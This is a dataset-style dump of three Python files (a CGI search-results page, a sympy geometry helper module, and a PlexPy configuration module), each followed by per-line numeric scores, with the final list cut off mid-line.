print(yate.start_response()) print(yate.include_header("The is a search page for " + str(term))) print(yate.include_menu({"satisfied, go back Google": "/index.html"}, str(term) )) #print(yate.start_form("controller2.py")) #print(yate.input_text('terms',str(term))) #print(yate.end_form("enter to my app")) #print(yate.para("Query for:" + str(term))) #print("<br /><br />") for title, content, url in zip(onePageTitles,onePageContents,onePageUrls): print(yate.render_search_result(title,content,url)) #mypage = markup.page() #mypage.addfooter("fuck you") #print (mypage) #print("<button type="button" onclick="alert('Hello world!')">Click Me!</button>")
[ "#! /usr/local/bin/python3\n", "import cgitb\n", "cgitb.enable()\n", "import sys\n", "import cgi \n", "import urllib\n", "\n", "import os, sys, inspect\n", "# realpath() with make your script run, even if you symlink it :)\n", "cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile( inspect.currentframe() ))[0]))\n", "if cmd_folder not in sys.path:\n", "\tsys.path.insert(0, cmd_folder)\n", "# use this if you want to include modules from a subforder\n", "cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],\"subfolder\")))\n", "if cmd_subfolder not in sys.path:\n", "\tsys.path.insert(0, cmd_subfolder)\n", "\n", "import yate\n", "import mainmodel\n", "import markup\n", "\n", "####################SINGLE QUERY ##########################################\n", "def jsonPaserForOnePage(each_json):\n", "\ttitles = []\n", "\tcontents = []\n", "\turls = []\n", "\t####### each JSON means each page result in a JSON \n", "\tfor result in each_json['responseData']['results']:\n", "\t\ttemp_title = urllib.unquote(result['titleNoFormatting']).encode('utf-8')\n", "\t\ttitles.append(temp_title)\n", "\t\ttemp_content = result['content'].encode('utf-8').strip(\"<b>...</b>\").replace(\"<b>\",'').replace(\"</b>\",'').replace(\"&#39;\",\"'\").strip()\n", "\t\tcontents.append(temp_content)\n", "\t\ttemp_url = urllib.unquote(result['unescapedUrl']).encode('utf-8')\n", "\t\turls.append(temp_url)\n", "\treturn titles, contents, urls\n", "\t\n", "def each_jsonPaser(each_json):\n", "\tall_result = []\n", "\tfor result in each_json['responseData']['results']:\n", "\t\teach_result = []\n", "\t\ttemp_title = urllib.unquote(result['titleNoFormatting']).encode('utf-8')\n", "\t\teach_result.append(temp_title)\n", "\t\ttemp_content = result['content'].encode('utf-8').strip(\"<b>...</b>\").replace(\"<b>\",'').replace(\"</b>\",'').replace(\"&#39;\",\"'\").strip()\n", "\t\teach_result.append(temp_content)\n", "\t\ttemp_url = urllib.unquote(result['unescapedUrl']).encode('utf-8')\n", "\t\teach_result.append(temp_url)\n", "\t\tall_result.append(each_result)\n", "\treturn all_result\n", "\t\n", "def each_jsonPaserUsingDic(each_json):\n", "\tall_result = {}\n", "\tfor result in each_json['responseData']['results']:\n", "\t\ttemp_title = urllib.unquote(result['titleNoFormatting']).encode('utf-8')\n", "\t\tall_result['title'] = temp_title\n", "\t\teach_result.append(temp_title)\n", "\t\ttemp_content = result['content'].encode('utf-8').strip(\"<b>...</b>\").replace(\"<b>\",'').replace(\"</b>\",'').replace(\"&#39;\",\"'\").strip()\n", "\t\teach_result.append(temp_content)\n", "\t\ttemp_url = urllib.unquote(result['unescapedUrl']).encode('utf-8')\n", "\t\teach_result.append(temp_url)\n", "\t\tall_result.append(each_result)\n", "\treturn all_result\n", "\t\n", "########## MULTIPLE query ########################\n", "\n", "\n", "\n", "####### controller process #############3\n", "\n", "form_data = cgi.FieldStorage()\n", "term = form_data['terms'].value\n", "\n", "# \"results\" are the JSONs list containing each page result FOR ONE QUERY [[ONE PAGE - title,content,url],[ONE PAGE - JSON]]\n", "results = mainmodel.get_googleResult_from_firstQuery(term)\n", "\n", "#for each in results:\t\n", "#\tfordiaply = each_jsonPaser(each)\n", "\n", "for each in results:\t\n", "\tonePageTitles,onePageContents,onePageUrls = jsonPaserForOnePage(each)\n", "\n", "print(yate.start_response())\n", "print(yate.include_header(\"The is a search page for \" + str(term)))\n", "print(yate.include_menu({\"satisfied, go back Google\": \"/index.html\"}, str(term) ))\n", "#print(yate.start_form(\"controller2.py\"))\n", "#print(yate.input_text('terms',str(term)))\n", "#print(yate.end_form(\"enter to my app\"))\n", "#print(yate.para(\"Query for:\" + str(term)))\n", "\n", "#print(\"<br /><br />\")\n", "for title, content, url in zip(onePageTitles,onePageContents,onePageUrls):\n", "\t\tprint(yate.render_search_result(title,content,url))\n", "#mypage = markup.page()\n", "#mypage.addfooter(\"fuck you\")\n", "#print (mypage)\n", "\n", "\n", "#print(\"<button type=\"button\" onclick=\"alert('Hello world!')\">Click Me!</button>\")\n", "\n" ]
[ 0, 0, 0, 0.09090909090909091, 0.16666666666666666, 0.07142857142857142, 0, 0.08333333333333333, 0, 0.027777777777777776, 0, 0.03125, 0, 0.029197080291970802, 0, 0.02857142857142857, 0, 0.08333333333333333, 0.058823529411764705, 0.07142857142857142, 0, 0.013157894736842105, 0.027777777777777776, 0.07692307692307693, 0.06666666666666667, 0.09090909090909091, 0.05660377358490566, 0.018867924528301886, 0.013333333333333334, 0.03571428571428571, 0.0364963503649635, 0.03125, 0.014705882352941176, 0.041666666666666664, 0.03225806451612903, 1, 0.03225806451612903, 0.058823529411764705, 0.018867924528301886, 0.05263157894736842, 0.013333333333333334, 0.030303030303030304, 0.0364963503649635, 0.02857142857142857, 0.014705882352941176, 0.03225806451612903, 0.030303030303030304, 0.05263157894736842, 1, 0.02564102564102564, 0.058823529411764705, 0.018867924528301886, 0.013333333333333334, 0.02857142857142857, 0.030303030303030304, 0.0364963503649635, 0.02857142857142857, 0.014705882352941176, 0.03225806451612903, 0.030303030303030304, 0.05263157894736842, 1, 0.0196078431372549, 0, 0, 0, 0.047619047619047616, 0, 0.03225806451612903, 0, 0, 0.008064516129032258, 0, 0, 0.08695652173913043, 0.02857142857142857, 0, 0.045454545454545456, 0.05555555555555555, 0, 0, 0, 0.024096385542168676, 0.023809523809523808, 0.023255813953488372, 0.024390243902439025, 0.022727272727272728, 0, 0.043478260869565216, 0.02666666666666667, 0.07407407407407407, 0.041666666666666664, 0.03333333333333333, 0.0625, 0, 0, 0.024096385542168676, 1 ]
98
0.069581
false
#!/usr/bin/python3 # Globals.py # # Copyright (C) 2015 Caian Benedicto <caianbene@gmail.com> # # This file is part of Asparagus # # Asparagus is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2, or (at your option) # any later version. # # Asparagus is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # import sympy from sympy.parsing.sympy_parser import parse_expr def time(symbols): return symbols.getSymbol('$global', 'time', nonnegative=True) time_alias = 't' def gravity(symbols): return ( symbols.getSymbol('$global', 'gravity.value', nonnegative=True), symbols.getSymbol('$global', 'gravity.theta') ) gravity_alias = 'g' def isTimeConstant(s, symbols): s = sympy.simplify(s) if s == time(symbols): return False args = s.args for arg in args: if not isTimeConstant(arg, symbols): return False return True def convertAttachment(att, mode = 't'): m = att[2] if mode == m: return (att[0], att[1], att[2]) elif mode == 'r': if m == 'p': d = att[0] t = att[1] return (d*sympy.sin(t), d*sympy.cos(t), mode) else: raise Exception('invalid attachment mode %s' % str(m)) elif mode == 'p': if m == 'r': x = att[0] y = att[1] # TODO remember to flip y during c->r # check theta direction return (sympy.sqrt(x**2+y**2), sympy.atan2(x, y), mode) else: raise Exception('invalid attachment mode %s' % str(m)) else: raise Exception('invalid attachment mode %s' % str(mode)) def positify(expr, symbag): if expr.is_Symbol: symbag[expr] = sympy.Symbol(expr.name, positive=True) else: for arg in expr.args: positify(arg, symbag) def parseExpr(expr): if expr[0] == '"' and expr[-1] == '"': expr = expr[1:-1] symbag = {} expr = parse_expr(expr) positify(expr, symbag) expr = expr.subs(symbag) return expr def no_alias(t): return t def getObjName(name): return name def getAttachProp(objname, prop): return 'attach.%s.%s' % (objname, prop) def getPropString(objname, prop): return '%s.%s' % (objname, prop) def norm2d(a): return sympy.simplify(sympy.sqrt(a[0]**2+a[1]**2)) def cross2d(a, b): return sympy.simplify(a[0]*b[1]-b[0]*a[1]) def dot2d(a, b): return sympy.simplify(a[0]*b[0]+a[1]*b[1]) def ssign(a): return sympy.simplify(sympy.sign(a))
[ "#!/usr/bin/python3\n", "\n", "# Globals.py\n", "#\n", "# Copyright (C) 2015 Caian Benedicto <caianbene@gmail.com>\n", "#\n", "# This file is part of Asparagus\n", "#\n", "# Asparagus is free software; you can redistribute it and/or modify it \n", "# under the terms of the GNU General Public License as published by \n", "# the Free Software Foundation; either version 2, or (at your option)\n", "# any later version.\n", "#\n", "# Asparagus is distributed in the hope that it will be useful,\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "# GNU General Public License for more details.\n", "#\n", "\n", "import sympy\n", "from sympy.parsing.sympy_parser import parse_expr\n", "\n", "def time(symbols): \n", " return symbols.getSymbol('$global', 'time', nonnegative=True)\n", "\n", "time_alias = 't'\n", "\n", "def gravity(symbols): \n", " return (\n", " symbols.getSymbol('$global', 'gravity.value', nonnegative=True),\n", " symbols.getSymbol('$global', 'gravity.theta')\n", " )\n", "\n", "gravity_alias = 'g'\n", "\n", "def isTimeConstant(s, symbols):\n", " s = sympy.simplify(s)\n", " if s == time(symbols):\n", " return False\n", " args = s.args\n", " for arg in args:\n", " if not isTimeConstant(arg, symbols):\n", " return False\n", " return True\n", "\n", "def convertAttachment(att, mode = 't'):\n", " m = att[2]\n", " if mode == m:\n", " return (att[0], att[1], att[2])\n", " elif mode == 'r':\n", " if m == 'p':\n", " d = att[0]\n", " t = att[1]\n", " return (d*sympy.sin(t), d*sympy.cos(t), mode)\n", " else:\n", " raise Exception('invalid attachment mode %s' % str(m))\n", " elif mode == 'p':\n", " if m == 'r':\n", " x = att[0]\n", " y = att[1]\n", " # TODO remember to flip y during c->r\n", " # check theta direction\n", " return (sympy.sqrt(x**2+y**2), sympy.atan2(x, y), mode)\n", " else:\n", " raise Exception('invalid attachment mode %s' % str(m))\n", " else:\n", " raise Exception('invalid attachment mode %s' % str(mode))\n", "\n", "def positify(expr, symbag):\n", " if expr.is_Symbol:\n", " symbag[expr] = sympy.Symbol(expr.name, positive=True)\n", " else:\n", " for arg in expr.args:\n", " positify(arg, symbag)\n", "\n", "def parseExpr(expr):\n", " if expr[0] == '\"' and expr[-1] == '\"':\n", " expr = expr[1:-1]\n", " symbag = {}\n", " expr = parse_expr(expr)\n", " positify(expr, symbag)\n", " expr = expr.subs(symbag)\n", " return expr\n", "\n", "def no_alias(t):\n", " return t\n", "\n", "def getObjName(name):\n", " return name\n", "\n", "def getAttachProp(objname, prop):\n", " return 'attach.%s.%s' % (objname, prop)\n", "\n", "def getPropString(objname, prop):\n", " return '%s.%s' % (objname, prop)\n", "\n", "def norm2d(a):\n", " return sympy.simplify(sympy.sqrt(a[0]**2+a[1]**2))\n", "\n", "def cross2d(a, b):\n", " return sympy.simplify(a[0]*b[1]-b[0]*a[1])\n", "\n", "def dot2d(a, b):\n", " return sympy.simplify(a[0]*b[0]+a[1]*b[1])\n", "\n", "def ssign(a):\n", " return sympy.simplify(sympy.sign(a))\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0.0136986301369863, 0.014285714285714285, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1, 0, 0, 0.058823529411764705, 0, 0.08695652173913043, 0, 0, 0, 0, 0, 0.05, 0, 0.03125, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.075, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0.058823529411764705, 0, 0, 0.045454545454545456, 0, 0, 0.029411764705882353, 0, 0, 0.029411764705882353, 0, 0, 0.06666666666666667, 0, 0, 0.05263157894736842, 0, 0, 0.058823529411764705, 0, 0, 0.07142857142857142, 0 ]
107
0.008654
false
import plexpy.logger import itertools import os import re from configobj import ConfigObj def bool_int(value): """ Casts a config value into a 0 or 1 """ if isinstance(value, basestring): if value.lower() in ('', '0', 'false', 'f', 'no', 'n', 'off'): value = 0 return int(bool(value)) _CONFIG_DEFINITIONS = { 'DATE_FORMAT': (str, 'General', 'YYYY-MM-DD'), 'GROUPING_GLOBAL_HISTORY': (int, 'PlexWatch', 0), 'GROUPING_USER_HISTORY': (int, 'PlexWatch', 0), 'GROUPING_CHARTS': (int, 'PlexWatch', 0), 'PLEXWATCH_DATABASE': (str, 'PlexWatch', ''), 'PMS_IDENTIFIER': (str, 'PMS', ''), 'PMS_IP': (str, 'PMS', '127.0.0.1'), 'PMS_IS_REMOTE': (int, 'PMS', 0), 'PMS_LOGS_FOLDER': (str, 'PMS', ''), 'PMS_PORT': (int, 'PMS', 32400), 'PMS_TOKEN': (str, 'PMS', ''), 'PMS_SSL': (int, 'General', 0), 'PMS_URL': (str, 'PMS', ''), 'PMS_USE_BIF': (int, 'PMS', 0), 'PMS_UUID': (str, 'PMS', ''), 'TIME_FORMAT': (str, 'General', 'HH:mm'), 'API_ENABLED': (int, 'General', 0), 'API_KEY': (str, 'General', ''), 'BOXCAR_ENABLED': (int, 'Boxcar', 0), 'BOXCAR_TOKEN': (str, 'Boxcar', ''), 'BOXCAR_ON_PLAY': (int, 'Boxcar', 0), 'BOXCAR_ON_STOP': (int, 'Boxcar', 0), 'BOXCAR_ON_PAUSE': (int, 'Boxcar', 0), 'BOXCAR_ON_RESUME': (int, 'Boxcar', 0), 'BOXCAR_ON_BUFFER': (int, 'Boxcar', 0), 'BOXCAR_ON_WATCHED': (int, 'Boxcar', 0), 'BUFFER_THRESHOLD': (int, 'Monitoring', 3), 'BUFFER_WAIT': (int, 'Monitoring', 900), 'CACHE_DIR': (str, 'General', ''), 'CACHE_SIZEMB': (int, 'Advanced', 32), 'CHECK_GITHUB': (int, 'General', 1), 'CHECK_GITHUB_INTERVAL': (int, 'General', 360), 'CHECK_GITHUB_ON_STARTUP': (int, 'General', 1), 'CLEANUP_FILES': (int, 'General', 0), 'CONFIG_VERSION': (str, 'General', '0'), 'DO_NOT_OVERRIDE_GIT_BRANCH': (int, 'General', 0), 'EMAIL_ENABLED': (int, 'Email', 0), 'EMAIL_FROM': (str, 'Email', ''), 'EMAIL_TO': (str, 'Email', ''), 'EMAIL_SMTP_SERVER': (str, 'Email', ''), 'EMAIL_SMTP_USER': (str, 'Email', ''), 'EMAIL_SMTP_PASSWORD': (str, 'Email', ''), 'EMAIL_SMTP_PORT': (int, 'Email', 25), 'EMAIL_TLS': (int, 'Email', 0), 'EMAIL_ON_PLAY': (int, 'Email', 0), 'EMAIL_ON_STOP': (int, 'Email', 0), 'EMAIL_ON_PAUSE': (int, 'Email', 0), 'EMAIL_ON_RESUME': (int, 'Email', 0), 'EMAIL_ON_BUFFER': (int, 'Email', 0), 'EMAIL_ON_WATCHED': (int, 'Email', 0), 'ENABLE_HTTPS': (int, 'General', 0), 'FIRST_RUN_COMPLETE': (int, 'General', 0), 'FREEZE_DB': (int, 'General', 0), 'GIT_BRANCH': (str, 'General', 'master'), 'GIT_PATH': (str, 'General', ''), 'GIT_USER': (str, 'General', 'drzoidberg33'), 'GROWL_ENABLED': (int, 'Growl', 0), 'GROWL_HOST': (str, 'Growl', ''), 'GROWL_PASSWORD': (str, 'Growl', ''), 'GROWL_ON_PLAY': (int, 'Growl', 0), 'GROWL_ON_STOP': (int, 'Growl', 0), 'GROWL_ON_PAUSE': (int, 'Growl', 0), 'GROWL_ON_RESUME': (int, 'Growl', 0), 'GROWL_ON_BUFFER': (int, 'Growl', 0), 'GROWL_ON_WATCHED': (int, 'Growl', 0), 'HOME_LIBRARY_CARDS': (str, 'General', 'library_statistics_first'), 'HOME_STATS_LENGTH': (int, 'General', 30), 'HOME_STATS_TYPE': (int, 'General', 0), 'HOME_STATS_COUNT': (int, 'General', 5), 'HOME_STATS_CARDS': (str, 'General', 'watch_statistics, top_tv, popular_tv, top_movies, popular_movies, top_music, popular_music, top_users, top_platforms, last_watched'), 'HTTPS_CERT': (str, 'General', ''), 'HTTPS_KEY': (str, 'General', ''), 'HTTP_HOST': (str, 'General', '0.0.0.0'), 'HTTP_PASSWORD': (str, 'General', ''), 'HTTP_PORT': (int, 'General', 8181), 'HTTP_PROXY': (int, 'General', 0), 'HTTP_ROOT': (str, 'General', '/'), 'HTTP_USERNAME': (str, 'General', ''), 'INTERFACE': (str, 'General', 'default'), 'IP_LOGGING_ENABLE': (int, 'General', 0), 'JOURNAL_MODE': (str, 'Advanced', 'wal'), 'LAUNCH_BROWSER': (int, 'General', 1), 'LOG_DIR': (str, 'General', ''), 'LOGGING_IGNORE_INTERVAL': (int, 'Monitoring', 120), 'MOVIE_NOTIFY_ENABLE': (int, 'Monitoring', 0), 'MOVIE_NOTIFY_ON_START': (int, 'Monitoring', 1), 'MOVIE_NOTIFY_ON_STOP': (int, 'Monitoring', 0), 'MOVIE_NOTIFY_ON_PAUSE': (int, 'Monitoring', 0), 'MUSIC_NOTIFY_ENABLE': (int, 'Monitoring', 0), 'MUSIC_NOTIFY_ON_START': (int, 'Monitoring', 1), 'MUSIC_NOTIFY_ON_STOP': (int, 'Monitoring', 0), 'MUSIC_NOTIFY_ON_PAUSE': (int, 'Monitoring', 0), 'MUSIC_LOGGING_ENABLE': (int, 'Monitoring', 0), 'MONITORING_INTERVAL': (int, 'Monitoring', 60), 'NMA_APIKEY': (str, 'NMA', ''), 'NMA_ENABLED': (int, 'NMA', 0), 'NMA_PRIORITY': (int, 'NMA', 0), 'NMA_ON_PLAY': (int, 'NMA', 0), 'NMA_ON_STOP': (int, 'NMA', 0), 'NMA_ON_PAUSE': (int, 'NMA', 0), 'NMA_ON_RESUME': (int, 'NMA', 0), 'NMA_ON_BUFFER': (int, 'NMA', 0), 'NMA_ON_WATCHED': (int, 'NMA', 0), 'NOTIFY_WATCHED_PERCENT': (int, 'Monitoring', 85), 'NOTIFY_ON_START_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'), 'NOTIFY_ON_START_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) started playing {title}.'), 'NOTIFY_ON_STOP_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'), 'NOTIFY_ON_STOP_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has stopped {title}.'), 'NOTIFY_ON_PAUSE_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'), 'NOTIFY_ON_PAUSE_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has paused {title}.'), 'NOTIFY_ON_RESUME_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'), 'NOTIFY_ON_RESUME_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has resumed {title}.'), 'NOTIFY_ON_BUFFER_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'), 'NOTIFY_ON_BUFFER_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) is buffering {title}.'), 'NOTIFY_ON_WATCHED_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'), 'NOTIFY_ON_WATCHED_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has watched {title}.'), 'OSX_NOTIFY_APP': (str, 'OSX_Notify', '/Applications/PlexPy'), 'OSX_NOTIFY_ENABLED': (int, 'OSX_Notify', 0), 'OSX_NOTIFY_ON_PLAY': (int, 'OSX_Notify', 0), 'OSX_NOTIFY_ON_STOP': (int, 'OSX_Notify', 0), 'OSX_NOTIFY_ON_PAUSE': (int, 'OSX_Notify', 0), 'OSX_NOTIFY_ON_RESUME': (int, 'OSX_Notify', 0), 'OSX_NOTIFY_ON_BUFFER': (int, 'OSX_Notify', 0), 'OSX_NOTIFY_ON_WATCHED': (int, 'OSX_Notify', 0), 'PLEX_CLIENT_HOST': (str, 'Plex', ''), 'PLEX_ENABLED': (int, 'Plex', 0), 'PLEX_PASSWORD': (str, 'Plex', ''), 'PLEX_USERNAME': (str, 'Plex', ''), 'PLEX_ON_PLAY': (int, 'Plex', 0), 'PLEX_ON_STOP': (int, 'Plex', 0), 'PLEX_ON_PAUSE': (int, 'Plex', 0), 'PLEX_ON_RESUME': (int, 'Plex', 0), 'PLEX_ON_BUFFER': (int, 'Plex', 0), 'PLEX_ON_WATCHED': (int, 'Plex', 0), 'PROWL_ENABLED': (int, 'Prowl', 0), 'PROWL_KEYS': (str, 'Prowl', ''), 'PROWL_PRIORITY': (int, 'Prowl', 0), 'PROWL_ON_PLAY': (int, 'Prowl', 0), 'PROWL_ON_STOP': (int, 'Prowl', 0), 'PROWL_ON_PAUSE': (int, 'Prowl', 0), 'PROWL_ON_RESUME': (int, 'Prowl', 0), 'PROWL_ON_BUFFER': (int, 'Prowl', 0), 'PROWL_ON_WATCHED': (int, 'Prowl', 0), 'PUSHALOT_APIKEY': (str, 'Pushalot', ''), 'PUSHALOT_ENABLED': (int, 'Pushalot', 0), 'PUSHALOT_ON_PLAY': (int, 'Pushalot', 0), 'PUSHALOT_ON_STOP': (int, 'Pushalot', 0), 'PUSHALOT_ON_PAUSE': (int, 'Pushalot', 0), 'PUSHALOT_ON_RESUME': (int, 'Pushalot', 0), 'PUSHALOT_ON_BUFFER': (int, 'Pushalot', 0), 'PUSHALOT_ON_WATCHED': (int, 'Pushalot', 0), 'PUSHBULLET_APIKEY': (str, 'PushBullet', ''), 'PUSHBULLET_DEVICEID': (str, 'PushBullet', ''), 'PUSHBULLET_CHANNEL_TAG': (str, 'PushBullet', ''), 'PUSHBULLET_ENABLED': (int, 'PushBullet', 0), 'PUSHBULLET_ON_PLAY': (int, 'PushBullet', 0), 'PUSHBULLET_ON_STOP': (int, 'PushBullet', 0), 'PUSHBULLET_ON_PAUSE': (int, 'PushBullet', 0), 'PUSHBULLET_ON_RESUME': (int, 'PushBullet', 0), 'PUSHBULLET_ON_BUFFER': (int, 'PushBullet', 0), 'PUSHBULLET_ON_WATCHED': (int, 'PushBullet', 0), 'PUSHOVER_APITOKEN': (str, 'Pushover', ''), 'PUSHOVER_ENABLED': (int, 'Pushover', 0), 'PUSHOVER_KEYS': (str, 'Pushover', ''), 'PUSHOVER_PRIORITY': (int, 'Pushover', 0), 'PUSHOVER_ON_PLAY': (int, 'Pushover', 0), 'PUSHOVER_ON_STOP': (int, 'Pushover', 0), 'PUSHOVER_ON_PAUSE': (int, 'Pushover', 0), 'PUSHOVER_ON_RESUME': (int, 'Pushover', 0), 'PUSHOVER_ON_BUFFER': (int, 'Pushover', 0), 'PUSHOVER_ON_WATCHED': (int, 'Pushover', 0), 'REFRESH_USERS_INTERVAL': (int, 'Monitoring', 12), 'REFRESH_USERS_ON_STARTUP': (int, 'Monitoring', 1), 'TV_NOTIFY_ENABLE': (int, 'Monitoring', 0), 'TV_NOTIFY_ON_START': (int, 'Monitoring', 1), 'TV_NOTIFY_ON_STOP': (int, 'Monitoring', 0), 'TV_NOTIFY_ON_PAUSE': (int, 'Monitoring', 0), 'TWITTER_ENABLED': (int, 'Twitter', 0), 'TWITTER_PASSWORD': (str, 'Twitter', ''), 'TWITTER_PREFIX': (str, 'Twitter', 'PlexPy'), 'TWITTER_USERNAME': (str, 'Twitter', ''), 'TWITTER_ON_PLAY': (int, 'Twitter', 0), 'TWITTER_ON_STOP': (int, 'Twitter', 0), 'TWITTER_ON_PAUSE': (int, 'Twitter', 0), 'TWITTER_ON_RESUME': (int, 'Twitter', 0), 'TWITTER_ON_BUFFER': (int, 'Twitter', 0), 'TWITTER_ON_WATCHED': (int, 'Twitter', 0), 'UPDATE_DB_INTERVAL': (int, 'General', 24), 'VERIFY_SSL_CERT': (bool_int, 'Advanced', 1), 'VIDEO_LOGGING_ENABLE': (int, 'Monitoring', 1), 'XBMC_ENABLED': (int, 'XBMC', 0), 'XBMC_HOST': (str, 'XBMC', ''), 'XBMC_PASSWORD': (str, 'XBMC', ''), 'XBMC_USERNAME': (str, 'XBMC', ''), 'XBMC_ON_PLAY': (int, 'XBMC', 0), 'XBMC_ON_STOP': (int, 'XBMC', 0), 'XBMC_ON_PAUSE': (int, 'XBMC', 0), 'XBMC_ON_RESUME': (int, 'XBMC', 0), 'XBMC_ON_BUFFER': (int, 'XBMC', 0), 'XBMC_ON_WATCHED': (int, 'XBMC', 0) } # pylint:disable=R0902 # it might be nice to refactor for fewer instance variables class Config(object): """ Wraps access to particular values in a config file """ def __init__(self, config_file): """ Initialize the config with values from a file """ self._config_file = config_file self._config = ConfigObj(self._config_file, encoding='utf-8') for key in _CONFIG_DEFINITIONS.keys(): self.check_setting(key) def _define(self, name): key = name.upper() ini_key = name.lower() definition = _CONFIG_DEFINITIONS[key] if len(definition) == 3: definition_type, section, default = definition else: definition_type, section, _, default = definition return key, definition_type, section, ini_key, default def check_section(self, section): """ Check if INI section exists, if not create it """ if section not in self._config: self._config[section] = {} return True else: return False def check_setting(self, key): """ Cast any value in the config to the right type or use the default """ key, definition_type, section, ini_key, default = self._define(key) self.check_section(section) try: my_val = definition_type(self._config[section][ini_key]) except Exception: my_val = definition_type(default) self._config[section][ini_key] = my_val return my_val def write(self): """ Make a copy of the stored config and write it to the configured file """ new_config = ConfigObj(encoding="UTF-8") new_config.filename = self._config_file # first copy over everything from the old config, even if it is not # correctly defined to keep from losing data for key, subkeys in self._config.items(): if key not in new_config: new_config[key] = {} for subkey, value in subkeys.items(): new_config[key][subkey] = value # next make sure that everything we expect to have defined is so for key in _CONFIG_DEFINITIONS.keys(): key, definition_type, section, ini_key, default = self._define(key) self.check_setting(key) if section not in new_config: new_config[section] = {} new_config[section][ini_key] = self._config[section][ini_key] # Write it to file plexpy.logger.info("Writing configuration to file") try: new_config.write() except IOError as e: plexpy.logger.error("Error writing configuration file: %s", e) def __getattr__(self, name): """ Returns something from the ini unless it is a real property of the configuration object or is not all caps. """ if not re.match(r'[A-Z_]+$', name): return super(Config, self).__getattr__(name) else: return self.check_setting(name) def __setattr__(self, name, value): """ Maps all-caps properties to ini values unless they exist on the configuration object. """ if not re.match(r'[A-Z_]+$', name): super(Config, self).__setattr__(name, value) return value else: key, definition_type, section, ini_key, default = self._define(name) self._config[section][ini_key] = definition_type(value) return self._config[section][ini_key] def process_kwargs(self, kwargs): """ Given a big bunch of key value pairs, apply them to the ini. """ for name, value in kwargs.items(): key, definition_type, section, ini_key, default = self._define(name) self._config[section][ini_key] = definition_type(value)
[ "import plexpy.logger\n", "import itertools\n", "import os\n", "import re\n", "from configobj import ConfigObj\n", "\n", "\n", "def bool_int(value):\n", " \"\"\"\n", " Casts a config value into a 0 or 1\n", " \"\"\"\n", " if isinstance(value, basestring):\n", " if value.lower() in ('', '0', 'false', 'f', 'no', 'n', 'off'):\n", " value = 0\n", " return int(bool(value))\n", "\n", "\n", "\n", "_CONFIG_DEFINITIONS = {\n", " 'DATE_FORMAT': (str, 'General', 'YYYY-MM-DD'),\n", " 'GROUPING_GLOBAL_HISTORY': (int, 'PlexWatch', 0),\n", " 'GROUPING_USER_HISTORY': (int, 'PlexWatch', 0),\n", " 'GROUPING_CHARTS': (int, 'PlexWatch', 0),\n", " 'PLEXWATCH_DATABASE': (str, 'PlexWatch', ''),\n", " 'PMS_IDENTIFIER': (str, 'PMS', ''),\n", " 'PMS_IP': (str, 'PMS', '127.0.0.1'),\n", " 'PMS_IS_REMOTE': (int, 'PMS', 0),\n", " 'PMS_LOGS_FOLDER': (str, 'PMS', ''),\n", " 'PMS_PORT': (int, 'PMS', 32400),\n", " 'PMS_TOKEN': (str, 'PMS', ''),\n", " 'PMS_SSL': (int, 'General', 0),\n", " 'PMS_URL': (str, 'PMS', ''),\n", " 'PMS_USE_BIF': (int, 'PMS', 0),\n", " 'PMS_UUID': (str, 'PMS', ''),\n", " 'TIME_FORMAT': (str, 'General', 'HH:mm'),\n", " 'API_ENABLED': (int, 'General', 0),\n", " 'API_KEY': (str, 'General', ''),\n", " 'BOXCAR_ENABLED': (int, 'Boxcar', 0),\n", " 'BOXCAR_TOKEN': (str, 'Boxcar', ''),\n", " 'BOXCAR_ON_PLAY': (int, 'Boxcar', 0),\n", " 'BOXCAR_ON_STOP': (int, 'Boxcar', 0),\n", " 'BOXCAR_ON_PAUSE': (int, 'Boxcar', 0),\n", " 'BOXCAR_ON_RESUME': (int, 'Boxcar', 0),\n", " 'BOXCAR_ON_BUFFER': (int, 'Boxcar', 0),\n", " 'BOXCAR_ON_WATCHED': (int, 'Boxcar', 0),\n", " 'BUFFER_THRESHOLD': (int, 'Monitoring', 3),\n", " 'BUFFER_WAIT': (int, 'Monitoring', 900),\n", " 'CACHE_DIR': (str, 'General', ''),\n", " 'CACHE_SIZEMB': (int, 'Advanced', 32),\n", " 'CHECK_GITHUB': (int, 'General', 1),\n", " 'CHECK_GITHUB_INTERVAL': (int, 'General', 360),\n", " 'CHECK_GITHUB_ON_STARTUP': (int, 'General', 1),\n", " 'CLEANUP_FILES': (int, 'General', 0),\n", " 'CONFIG_VERSION': (str, 'General', '0'),\n", " 'DO_NOT_OVERRIDE_GIT_BRANCH': (int, 'General', 0),\n", " 'EMAIL_ENABLED': (int, 'Email', 0),\n", " 'EMAIL_FROM': (str, 'Email', ''),\n", " 'EMAIL_TO': (str, 'Email', ''),\n", " 'EMAIL_SMTP_SERVER': (str, 'Email', ''),\n", " 'EMAIL_SMTP_USER': (str, 'Email', ''),\n", " 'EMAIL_SMTP_PASSWORD': (str, 'Email', ''),\n", " 'EMAIL_SMTP_PORT': (int, 'Email', 25),\n", " 'EMAIL_TLS': (int, 'Email', 